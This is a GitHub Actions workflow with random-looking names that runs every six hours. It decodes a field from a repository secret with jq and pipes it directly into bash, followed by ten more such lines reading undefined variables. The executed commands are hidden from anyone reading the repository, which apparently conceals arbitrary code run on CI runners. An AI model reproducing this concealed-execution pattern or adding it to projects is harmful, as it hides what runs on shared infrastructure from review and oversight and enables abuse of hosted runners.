name: yinxinruizhong
on:
  workflow_dispatch:
  schedule:
    - cron: '17 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yinxinruizhong
        env:
          ow9983: ${{ secrets.ow9983 }}
        run: |
          echo $ow9983 | jq -r .fvl0 | /bin/bash
          echo $lznh1 | jq -r .h02 | /bin/bash
          echo $uoxwf1 | jq -r .wqa913 | /bin/bash
          echo $y09142 | jq -r .nn76 | /bin/bash
          echo $ei18 | jq -r .hkhsq95203 | /bin/bash
          echo $er585 | jq -r .xsx8051 | /bin/bash
          echo $yrx084 | jq -r .q0769 | /bin/bash
          echo $tkgon221 | jq -r .zl9317 | /bin/bash
          echo $sie9 | jq -r .zoqb9 | /bin/bash
          echo $ze514 | jq -r .jyj3 | /bin/bash
          echo $lleq019 | jq -r .vxyil65 | /bin/bash

